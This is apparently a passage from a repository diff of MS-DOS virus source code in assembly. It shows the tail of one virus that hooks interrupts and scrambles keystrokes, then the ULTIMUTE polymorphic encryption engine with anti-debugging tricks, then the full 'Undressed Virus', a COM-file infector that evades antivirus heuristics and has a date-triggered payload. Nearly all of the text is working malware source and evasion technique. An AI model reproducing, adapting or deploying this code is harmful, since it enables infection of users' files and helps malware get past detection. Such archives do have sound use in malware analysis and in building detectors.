MOV CX,2 ; Length to read
MOV DX,SI ; \ Address signature test buffer
ADD DX,000EH ; /
nop
MOV BX,[SI+10H] ; Get file handle
INT 21H ; DOS service
JB BP014A ; Branch if error
CMP AX,0 ; Did we read anything?
JE BP00F1 ; Branch if not
MOV AX,[SI+0EH] ; Get signature test
CMP AX,[SI] ; Is it signature?
JE BP014A ; Branch if yes
BP00F1: XOR CX,CX ; \ No offset
XOR DX,DX ; /
MOV AX,4202H ; Move file pointer function (EOF)
MOV BX,[SI+10H] ; Get file handle
INT 21H ; DOS service
JB BP014A ; Branch if error
SUB AX,3 ; Convert length to jump offset
MOV [SI+3],AX ; Store in jump
MOV BX,[SI+10H] ; Get file handle
MOV AH,40H ; Write handle function
MOV CX,OFFSET ENDADR ; Length of virus
NOP
MOV DX,SI ; \ Address start of virus
ADD DX,0 ; /
nop
INT 21H ; DOS service
JB BP014A ; Branch if error
ADD WORD PTR [SI+3],19H ; Add entry point offset to jump offset
XOR DX,DX ; \ No offset
XOR CX,CX ; /
MOV AX,4200H ; Move file pointer function
MOV BX,[SI+10H] ; Get file handle
INT 21H ; DOS service
JB BP014A ; Branch if error
MOV BX,[SI+10H] ; Get file handle
MOV AH,40H ; Write handle function
MOV CX,3 ; Length of jump
MOV DX,SI ; \ Address initial jump
ADD DX,2 ; /
nop
INT 21H ; DOS service
MOV AX,5701H ; Set file date & time function
MOV BX,[SI+10H] ; Get file handle
MOV CX,DW00D0+16H ; Get file time from DTA
MOV DX,DW00D0+18H ; Get file date from DTA
INT 21H ; DOS service
BP014A: MOV BX,[SI+10H] ; Get file handle
MOV AH,3EH ; Close handle function
INT 21H ; DOS service
MOV AX,4301H ; Set file attributes function
MOV DX,OFFSET DB00D0+1EH ; Address file path in DTA
MOV CL,DB00D0+15H ; Get attributes from DTA
INT 21H ; DOS service
BP015D: RET
; Interrupt 16H routine
BP015E: STI
CMP AH,0DDH ; Infection test function?
JNE BP0167 ; Branch if not
MOV AL,AH ; Copy function number
IRET
BP0167: CMP AH,0 ; Get key token?
JE BP01D8 ; Branch if yes
DB 0EAH ; Far jump
DW016D DW 0488H ; Int 16H offset
DW016F DW 39D8H ; Int 16H segment
DW0171 DW 0FA76H
DW0173 DW 0F9DCH
DW0175 DW 005AH
DB0177 DB 060H, 031H, 032H, 033H, 034H, 035H, 036H, 037H
DB 038H, 039H, 030H, 02DH, 03DH, 05CH, 07EH, 021H
DB 040H, 023H, 024H, 025H, 05EH, 026H, 02AH, 028H
DB 029H, 05FH, 02BH, 07CH, 071H, 077H, 065H, 072H
DB 074H, 079H, 075H, 069H, 06FH, 070H, 05BH, 05DH
DB 05BH, 061H, 073H, 064H, 066H, 067H, 068H, 06AH
DB 06BH, 06CH, 03BH, 027H, 07AH, 078H, 063H, 076H
DB 062H, 06EH, 06DH, 02CH, 02EH, 02FH, 051H, 057H
DB 045H, 052H, 054H, 059H, 055H, 049H, 04FH, 050H
DB 07BH, 07DH, 041H, 053H, 044H, 046H, 047H, 048H
DB 04AH, 04BH, 04CH, 03AH, 022H, 03BH, 05AH, 058H
DB 043H, 056H, 042H, 04EH, 04DH, 03CH, 03EH, 03FH
DB 02EH
BP01D8: PUSH SI
CALL BP01DC ; \ Get current address
BP01DC: POP SI ; /
PUSHF
CALL DWORD PTR CS:[SI-6FH] ; Execute original BIOS call
PUSH BX
PUSH ES
MOV BX,0040H ; \ Address system RAM
MOV ES,BX ; /
ASSUME ES:RAM
MOV BX,BW046C ; Get system clock, low word
PUSH BX
SUB BX,CS:[SI-6BH] ; DW0171
CMP BX,2
POP BX
MOV CS:[SI-6BH],BX
JG BP0236
XCHG BX,CS:[SI-69H] ; DW0173
SUB BX,CS:[SI-69H]
NEG BX
CMP BX,CS:[SI-67H] ; DW0175
JL BP0236
DEC WORD PTR CS:[SI-67H]
CMP WORD PTR CS:[SI-67H],6
JE BP021E
MOV WORD PTR CS:[SI-67H],005BH
BP021E: SUB SI,65H
PUSH CX
MOV CX,0061H
BP0225: CMP AL,CS:[SI]
JE BP0231
INC SI
LOOP BP0225
POP CX
JMP BP0236
BP0231: POP CX
MOV AL,CS:[SI+1]
BP0236: POP ES
POP BX
POP SI
RETF 2
; Interrupt 21H routine
ASSUME ES:NOTHING
BP023C: CMP AH,0 ; Terminate program?
JE BP0246 ; Branch if yes
CMP AH,4CH ; Load?
JNE BP025F ; Branch if not
BP0246: CALL BP026D ; Install virus in memory
MOV DX,CS:DW002C ; \ Set ES to environment block
MOV ES,DX ; /
MOV BX,0 ; Zero length
MOV AH,4AH ; Set block function
INT 21H ; DOS service
MOV DX,001DH ; \ Length to keep
ADD DX,1 ; /
MOV AH,31H ; Keep process function
BP025F: DB 0EAH ; Far jump
DW0260 DW 2DEAH ; Int 21H offset
DW0262 DW 4242H ; Int 21H segment
; Interrupt 20H routine
BP0264: MOV AX,4C00H ; Fake a load
JMP BP023C ; Process as a DOS service
DW0269 DW 2C08H ; Int 20H offset
DW026B DW 4242H ; Int 20H segment
; Install virus in memory
BP026D: PUSH CX
PUSH DI
PUSH SI
PUSH ES
CALL BP0274 ; \ Get current address
BP0274: POP SI ; /
PUSH SI
MOV DI,0100H ; Address start of area
MOV CX,OFFSET BP023C-BP015E ; Length to copy
BP027C: MOV AL,CS:[SI+OFFSET BP015E-BP0274] ; Get a byte
MOV CS:[DI],AL ; Store in new location
INC SI ; Next input position
INC DI ; Next output position
LOOP BP027C ; Repeat to end of area
POP SI
XOR CX,CX ; \ Address zero
MOV ES,CX ; /
ASSUME ES:VECTOR
MOV CX,CS:[SI-14H] ; \ Restore Int 21H offset
MOV BW0084,CX ; /
MOV CX,CS:[SI-12H] ; \ Restore Int 21H segment
MOV BW0086,CX ; /
MOV CX,CS:[SI-0BH] ; \ Restore Int 20H offset
MOV BW0080,CX ; /
MOV CX,CS:[SI-9] ; \ Restore Int 20H segment
MOV BW0082,CX ; /
MOV CX,0100H ; \ Install moved area as Int 16H
MOV BW0058,CX ; /
ASSUME ES:NOTHING
POP ES
POP SI
POP DI
POP CX
RET
; Test system for infection
BP02BE: PUSH AX
XOR AL,AL ; Clear register
MOV AH,0DDH ; Infection test function
INT 16H ; Keyboard I/O
CMP AL,AH ; Are they the same
JNE BP02CB ; Branch if not
POP AX
RET
; Install interrupts
BP02CB: PUSH BX
PUSH SI
PUSH ES
MOV DX,[SI+16H] ; Get generation count
CALL BP02D4 ; \ Get current address
BP02D4: POP SI ; /
PUSH BX
PUSH ES
MOV BX,0040H ; \ Address system RAM
MOV ES,BX ; /
ASSUME ES:RAM
MOV BX,BW046C ; Get system clock, low word
MOV CS:[SI+DW0171-BP02D4],BX ; Get system clock, low word
MOV CS:[SI+DW0173-BP02D4],BX ; Get system clock, low word
ASSUME ES:NOTHING
POP ES
POP BX
MOV [SI+DW0175-BP02D4],DX ; Save generation count
XOR AX,AX ; \ Address zero
MOV ES,AX ; /
ASSUME ES:VECTOR
MOV AX,BW0084 ; \ Save Int 21H offset (DW0260)
MOV CS:[SI-74H],AX ;
MOV AX,BW0086 ; \ Save Int 21H segment (DW0262)
MOV CS:[SI-72H],AX ;
MOV AX,BW0058 ; \ Save Int 16H offset (DW016D)
MOV CS:[SI+0FE99H],AX ; /
MOV AX,BW005A ; \ Save Int 16H segment (DW016F)
MOV CS:[SI+0FE9BH],AX ; /
MOV AX,BW0080 ; \ Save Int 20H offset (DW0269)
MOV CS:[SI-6BH],AX ; /
MOV AX,BW0082 ; \ Save Int 20H segment (DW026B)
MOV CS:[SI-69H],AX ; /
CLI
PUSH CS ; \ Set Int 21H segment
POP BW0086 ; /
MOV BW0084,SI ; \ Set Int 21H offset (BP023C)
SUB BW0084,0098H ; /
PUSH CS ; \ Set Int 20H segment
POP BW0082 ; /
MOV BW0080,SI ; \ Set Int 20H offset (BP0264)
SUB BW0080,70H ; /
PUSH CS ; \ Set Int 16H segment
POP BW005A ; /
MOV BW0058,SI ; \ Set Int 16H offset (BP015E)
SUB BW0058,0176H ; /
STI
ASSUME ES:NOTHING
POP ES
POP SI
POP BX
POP AX
RET
ENDADR EQU $
CODE ENDS
END

; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

584
MSDOS/Virus.MSDOS.Unknown.ultimute.asm Normal file
View File

@ -0,0 +1,584 @@
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; The ULTImate MUTation Engine .93á (c) 1993 Black Wolf Enterprises
; pardon the title, had to think of something... }-)
;
;ULTIMUTE is a mutation engine written for security-type applications and
;other areas where mutation of executable code is necessary. For my personal
;use, I have implemented it in Black Wolf's File Protection Utilities 2.1s,
;using it to encrypt the code placed onto EXE's and COM's to protect them
;from simple modification and/or unauthorized use. The encryption algorithms
;themselves are terribly simple - the main point being that they change
;each time and are difficult to trace through. This engine is written mainly
;to keep a "hack one, hack 'em all" approach from working on protected code,
;rather than to keep the code secure by a cryptologist's point of view.
;
;Including: Better Anti-Tracing abilities, 1017 byte size, Anti-Disassembling
; code, largely variable size for decoder. Also includes variable
; calling segmentation (i.e. CS<>ES<>DS, and can be called via
; near call, far call, or interrupt, the last of which can be
; useful as a memory-resident handler for multiple programs to
; use).
;
;Note: Please - this program and it's source have been released as freeware,
; but do NOT use the mutation engine in viruses! For one thing, the
; decryptor sequence has several repetitive sequences that can be scanned
; for, and for another, that just isn't what it was designed for and
; I would NOT appreciate it. If you MUST use someone else's mutation
; engine for such, use the TPE or MTE. I do NOT condone such, however.
;
;Any modifications made to this program should be listed below the solid line,
;along with the name of the programmer and the date the file was changed.
;Also - they should be commented where changed. If at all possible, report
;modifications to file to the address listed in the documentation.
;
;DISCLAIMER: The author takes ABSOLUTELY NO RESPONSIBILITY for any damages
;resulting from the use/misuse of this program. The user agrees to hold
;the author harmless for any consequences that may occur directly or
;indirectly from the use of this program by utilizing this program/file
;in any manner. Please use the engine with care.
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;Modifications:
; None as of yet (original release version)
.model tiny
.radix 16
.code
public _ULTMUTE, _END_ULTMUTE, Get_Rand, Init_Rand
;Underscores are used so that these routines can be called from C and other
;upper level languages. If you wish to use Get_Rand and Init_Rand in C, you
;need to add underscores in their names as well. Also, the random number
;generations may not be sound for all purposes. They do the job for this
;program, but they may/may not be mathematically correct.
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;ENTRY:
; CX=Code Length BX=New_Entry_Point
; DS:SI=Code AX=Calling Style
; ES:DI=Destination 1=Near Call, 2=Far Call, 3=Int Call
;
;RETURN:
; CX=New Size ES:DI = Same, now contains encrypted code
; w/decryptor
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
_ULTMUTE:
push bp ax bx cx dx es ds si di
call Get_Our_Offset
Offset_Mark:
inc cx
inc cx
mov word ptr cs:[bp+1+Set_Size],cx
mov word ptr cs:[Start_Pos+bp],bx
call Init_Rand
call Get_Base_Reg
call Setup_Choices
call Create_EncDec
call Copy_Decrypt_Code
call Encrypt_It
Ending_ULTMUTE:
pop di si ds es dx cx bx ax
add cx,cs:[Decryptor_Length+bp]
inc cx
inc cx
pop bp
cmp ax,3 ;Select Returning method, i.e. retn, retf, iret
je Int_Call
cmp ax,2
je Far_Call
Near_Call:
retn
Far_Call:
retf
Int_Call:
iret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Get_Our_Offset:
mov bp,sp
mov bp,ss:[bp] ;This trick finds our current offset
sub bp,offset Offset_Mark ;from the compiling point, as it
ret ;is usually not constant....
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Init_Rand:
push ax ds
xor ax,ax
mov ds,ax
mov ax,ds:[46c] ;Get seed from timer click at
pop ds ;0000:046c
mov cs:[rand_seed+bp],ax
pop ax
ret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Get_Rand:
push cx dx
mov ax,cs:[rand_seed+bp]
mov cx,0deadh
mul cx ;This probably isn't a good algorithm,
xor ax,0dada ;(understatement) but it works for
ror ax,1 ;our purposes in this application.
mov cs:[rand_seed+bp],ax
pop dx cx
ret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
rand_seed dw 0
Base_Reg db 0
Base_Pointer db 0
Start_Pos dw 0
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Get_Base_Reg:
call Get_Rand
and ax,11b
cmp al,1 ;Eliminate CX for loop purposes
je Get_Base_Reg
mov byte ptr cs:[bp+Base_Reg],al
Do_Pointer_Reg:
call Get_Rand
shr al,1
jc Done_Base_Reg
mov byte ptr cs:[bp+Base_Pointer],0
ret
Done_Base_Reg:
mov byte ptr cs:[bp+Base_Pointer],1
ret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Setup_Choices:
push ds si
push cs
pop ds
mov si,bp
call Get_Rand
mov word ptr [si+Xor_It+2],ax ;Randomize Xor
call Get_Rand
mov word ptr [si+Dummy3+2],ax ;Randomize Add/Sub
mov word ptr [si+Dummy7+2],ax
call Get_Rand ;Randomize Add/Sub
mov word ptr [si+Dummy4+2],ax
mov word ptr [si+Dummy8+2],ax
call Get_Rand
mov byte ptr [si+Rand_Byte1],al ;Randomize Random bytes
mov byte ptr [si+Rand_Byte2],ah
call Get_Rand
mov byte ptr [si+Rand_Byte3],al
mov byte ptr [si+Rand_Byte4],ah
call Get_Rand
mov byte ptr [si+Rand_Byte5],al
mov byte ptr [si+Rand_Byte6],ah
call Get_Rand
mov byte ptr [si+Rand_Byte7],al
mov byte ptr [si+Rand_Byte8],ah
call Get_Rand
mov byte ptr [si+Rand_Byte9],al
mov byte ptr [si+Rand_Byte10],ah
mov al,byte ptr [si+Base_Reg]
Set_Switcher:
and byte ptr [si+Switcher+1],0e6 ;Delete Register
mov ah,al
shl ah,1
shl ah,1
shl ah,1
or byte ptr [Switcher+1+si],ah
Set_Switcher_Pointer:
push ax
mov al,byte ptr [si+Base_Pointer]
or byte ptr [si+Switcher+1],al
Set_Set_Pointy:
and byte ptr [si+Set_Pointy],0fe
or byte ptr [si+Set_Pointy],al
and byte ptr [si+Inc_Pointy],0fe
or byte ptr [si+Inc_Pointy],al
and byte ptr [si+Inc_Pointy+1],0fe
or byte ptr [si+Inc_Pointy+1],al
pop ax
Set_Xorit:
and byte ptr [si+Xor_It+1],0fc
or byte ptr [si+Xor_It+1],al
Set_Flip_It:
and byte ptr [si+Flip_It+1],0e4
or byte ptr [si+Flip_It+1],al
or byte ptr [si+Flip_It+1],ah
Set_Rotate_It:
and byte ptr [si+do_rotate+1],0fc
or byte ptr [si+do_rotate+1],al
and byte ptr [si+do_rot2+1],0fc
or byte ptr [si+do_rot2+1],al
Set_IncDec:
and byte ptr [si+inc_bx_com],0fc
or byte ptr [si+inc_bx_com],al
and byte ptr [si+dec_bx_com],0fc
or byte ptr [si+dec_bx_com],al
and byte ptr [si+Dummy5],0fc
or byte ptr [si+Dummy5],al
and byte ptr [si+Dummy6],0fc
or byte ptr [si+Dummy6],al
Set_AddSub:
and byte ptr [si+Dummy3+1],0fc
and byte ptr [si+Dummy4+1],0fc
or byte ptr [si+Dummy3+1],al
or byte ptr [si+Dummy4+1],al
and byte ptr [si+Dummy7+1],0fc
and byte ptr [si+Dummy8+1],0fc
or byte ptr [si+Dummy7+1],al
or byte ptr [si+Dummy8+1],al
pop si ds
ret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Create_EncDec:
push es di cx
push cs
pop es
lea di,[bp+Encrypt_Sequence]
call Get_Rand
and ax,1fh
shr ax,1 ;Insure odd number of encryptors to prevent
shl ax,1 ;things like "INC AX / DEC AX" to leave prog
inc ax ;unencrypted.
mov byte ptr cs:[bp+Encrypt_Length],al
xchg cx,ax
Make_Pattern:
call Get_Rand
and ax,7
stosb
loop Make_Pattern
pop cx di es
ret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Copy_Decrypt_Code:
push si di bx cx ds
push bx di ;save for loop
push cs
pop ds
lea si,[bp+Set_Pointy]
movsw
movsb
lodsb ;Copy initial encryptor
movsw
movsb
lodsb
movsw
mov cl,byte ptr cs:[bp+Encrypt_Length]
xor ch,ch
lea si,[Encrypt_Sequence+bp] ;didn't have bp earlier
Dec_Set_Loop:
push cx
lodsb
push si ;Create the Decryptor from Sequence
mov bl,al
xor bh,bh
shl bx,1
add bx,bp
add bx,offset Command_Table
mov ax,cs:[bx]
mov cl,ah
xor ah,ah
lea si,[Xor_It+bp]
add si,ax
repnz movsb
pop si
pop cx
loop Dec_Set_Loop
lea si,[Switcher+bp]
movsw
lodsb ;Finish off Decryptor
movsw
lodsb
movsw ;Loop Setup
movsw
pop si bx
mov ax,di ;Set Loop
sub ax,si ;Do size of loop and offset from loop
mov cs:[Decryptor_Length+bp],ax
push ax ;Changed for Jump
not ax
add ax,5
stosw
pop ax
add bx,ax ;Set initial Pointer
mov es:[si+1],bx
mov ax,di
pop ds cx bx di si
push si di bx cx
Copy_Prog:
push ax
sub ax,di
add ax,bx
mov word ptr es:[di+1],ax
pop ax
mov di,ax
repnz movsb
pop cx bx di si
ret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Encrypt_It:
push bx cx di si
call set_seqp
mov ax,cs:[Decryptor_Length+bp]
inc ax
inc ax
add di,ax ;DI=start of code to be encrypted
;CX=Length of code to encrypt
mov si,di
push es
pop ds
Big_Enc_Loop:
push cx
call Switcher
mov cx,cs:[Encrypt_Length+bp]
Encrypt_Value:
push ax bx cx dx si di
mov si,cs:[Save_SI+bp]
dec si
mov bl,cs:[si] ;??
mov cs:[Save_SI+bp],si
lea si,cs:[Com_Table_2+bp]
xor bh,bh
shl bx,1
add si,bx
mov bx,cs:[si]
add bx,bp
mov word ptr cs:[Next_Command+bp],bx
pop di si dx cx bx ax
call cs:[Next_Command+bp]
Loop Encrypt_Value
pop cx
call Switcher
call Inc_Pointy
call set_seqp
loop Big_Enc_Loop
pop si di cx bx
ret
Save_SI dw 0
Next_Command dw 0
set_seqp:
push si
lea si,cs:[Encrypt_Sequence+bp] ;SI=Encrypt_Sequence
add si,cs:[Encrypt_Length+bp] ;SI=End of Encrypt Sequence
mov cs:[Save_SI+bp],SI
pop si
ret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Command_Table: ;8 commands -> 3 bits.
db [Xor_It-Xor_It],(Flip_It-Xor_It-1)
db [Flip_It-Xor_It],(Rotate_It_1-Flip_It-1)
db [Rotate_It_1-Xor_It],(Rotate_It_2-Rotate_It_1-1)
db [Rotate_It_2-Xor_It],(Dummy1-Rotate_It_2-1)
db [Dummy1-Xor_It],(Dummy2-Dummy1-1)
db [Dummy2-Xor_It],(Dummy3-Dummy2-1)
db [Dummy3-Xor_It],(Dummy4-Dummy3-1)
db [Dummy4-Xor_It],(Dummy5-Dummy4-1)
Com_Table_2:
dw [offset Xor_It]
dw [offset Flip_It]
dw [offset Rotate_It_2]
dw [offset Rotate_It_1]
dw [offset Dummy5]
dw [offset Dummy6]
dw [offset Dummy7]
dw [offset Dummy8]
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Set_Pointy:
mov di,1234 ;Pointer to Code
ret
Set_Size:
mov cx,1234 ;Size
ret
Switcher:
xchg bx,[di]
ret
Inc_Pointy:
inc di
inc di
ret
Loop_Mut:
dec cx
jz End_Loop_Mut
loop_set:
jmp _ULTMUTE
End_Loop_Mut:
ret
Xor_It:
xor bx,1234
ret
Flip_It:
xchg bh,bl
ret
Rotate_It_1:
jmp before_rot
do_rotate:
ror bx,1
jmp after_rot
before_rot:
push ax
call Ports1
pop ax
jmp do_rotate
Ports1:
in al,21
or al,02
out 21,al
ret
Ports2:
in al,21
xor al,02
out 21,al
ret
after_rot:
push ax
call ports2
pop ax
ret
Rotate_It_2:
cli
jmp confuzzled1
do_rot2:
rol bx,1
call Switch_Int_1_3
jmp donerot2
confuzzled1:
call Switch_Int_1_3
jmp do_rot2
Switch_Int_1_3:
push ax ds
xor ax,ax
mov ds,ax
jmp short exch1
db 0eah
exch1:
xchg ax,word ptr ds:[4]
jmp short exch2
db 9ah
exch2:
xchg ax,word ptr ds:[0c]
xchg ax,word ptr ds:[4]
pop ds ax
ret
donerot2:
ret
Dummy1:
jmp short inc_bx_com ;Kill Disassemblers
db 0ea
Rand_Byte1:
db 0ea
inc_bx_com:
inc bx
ret
Dummy2:
jmp short Kill_1
Rand_Byte2:
db 0ea
Cont_Kill1:
cli
xchg ax,ds:[84]
xchg ax,ds:[84]
sti
pop ds ax
dec_bx_com:
dec bx
jmp short quit_Kill1
Kill_1:
push ax ds
xor ax,ax
mov ds,ax ;Anti-Debugger (Kills Int 21)
jmp short Cont_Kill1
Rand_Byte3:
db 0e8
quit_Kill1:
ret
Dummy3:
add bx,1234
push bx
call throw_debugger
Rand_Byte4:
db 0e8 ;Prefetch Trick
into_throw:
sub bx,offset Rand_Byte4
add byte ptr [bx+trick_em+1],0ba
trick_em:
jmp short done_trick
Rand_Byte5:
db 0ea
throw_debugger:
pop bx
jmp short into_throw
Rand_Byte6:
db 0ea
done_trick:
sub byte ptr [bx+trick_em+1],0ba
pop bx
ret
Dummy4:
sub bx,1234
jmp short Get_IRQ
Rand_Byte7 db 0e8
Kill_IRQ:
out 21,al
xor al,2
jmp short Restore_IRQ
Rand_Byte8 db 0e8
Rand_Byte9 db 0e8 ;This will kill the keyboard
Get_IRQ: ;IRQ
push ax
in al,21
xor al,2
jmp short Kill_IRQ
Rand_Byte10 db 0e8
Restore_IRQ:
out 21,al
pop ax
ret
;The following are used for the encryption algorithm to reverse commands that
;include anti-tracing.
Dummy5:
dec bx
ret
Dummy6:
inc bx
ret
Dummy7:
sub bx,1234
ret
Dummy8:
add bx,1234
ret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Decryptor_Length dw 0
Encrypt_Length dw 0
Encrypt_Sequence db 30 dup(0)
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
_END_ULTMUTE:
end _ULTMUTE

126
MSDOS/Virus.MSDOS.Unknown.undr.asm Normal file
View File

@ -0,0 +1,126 @@
; Virus: The Undressed Virus
; Author: Arsonic[Codebreakers]
; Type: Appending
; Encryption: No
;
; Displays a Message on Feb 5th.
; Btw.. I Love Lisa..!
;---------------------------------------------------------------------------------------------------
; AV-Product | Detected? | Comments
;---------------------------------------------------------------------------------------------------
; F-Prot | No | Easy to Get Past.. FPROT SUCKS!
; TBAV | Unknown Virus | Well.. at least it aint say VCL!
; AVP | VCL.824 | VCL! ARRGGGHH!
;----------------------------------------------------------------------------------------------------
db 0e9h,0,0
start:
call delta
delta:
pop bp
sub bp,offset delta
mov cx,0ffffh ;kill heristics
fprot_loopy:
jmp back
mov ax,4c00h
int 21h
back:
loop fprot_loopy
mov cx,3
nop
mov di,100h
nop
lea si,[bp+buffer]
nop
rep movsb
find_first:
mov ah,4ch
add ah,2
nop
find_next:
nop
lea dx,[bp+filemask]
nop
int 21h
jnc infect
jmp check_payload
infect:
mov ax,3d02h
mov dx,9eh
int 21h
xchg ax,bx
mov ah,3dh
add ah,2
mov cx,3
lea dx,[bp+buffer]
int 21h
mov ax,word ptr[80h + 1ah]
nop
sub ax,end - start + 3
nop
cmp ax,word ptr[bp+buffer+1]
nop
je close_file
mov ax,word ptr[80h + 1ah]
nop
sub ax,3
nop
mov word ptr[bp+three+1],ax
mov ax,4200h
xor cx,cx
cwd
int 21h
mov ah,3eh
add ah,2
nop
lea dx,[bp+three]
nop
mov cx,3
nop
int 21h
mov ax,4202h
xor cx,cx
cwd
int 21h
mov ah,3eh
add ah,2
nop
lea dx,[bp+start]
nop
mov cx,end - start
nop
int 21h
close_file:
mov ah,3ch
add ah,2
int 21h
mov ah,4dh
add ah,2
jmp find_next
check_payload:
mov ah,2ah
int 21h
cmp dh,2 ;is it febuary?
je next
jmp close
next:
cmp dl,5 ;the 5th?
je payload ;yes.. display the message
jmp close ;no.. return control to the program.
payload:
mov ah,9h ;display message
lea dx,[bp+message]
int 21h
int 00h ;get keypress
int 16h
int 20h ;return to dos.
close:
mov di,100h ;return control to program
jmp di
three db 0e9h,0,0
filemask db '*.co*',0 ;if *.com it would be detected as trival variant
buffer db 0cdh,20h,0
virus db 'The UnDreSSeD',0 ; messages to give those av'ers a
author db 'Arsonic[CB]',0 ; nice scan string..
message db 'Happy Birthday Lisa!',10,13,'$'
Lisa db 'I LOVE U LISA!',0
end:

473
MSDOS/Virus.MSDOS.Unknown.unevie.asm Normal file
View File

@ -0,0 +1,473 @@
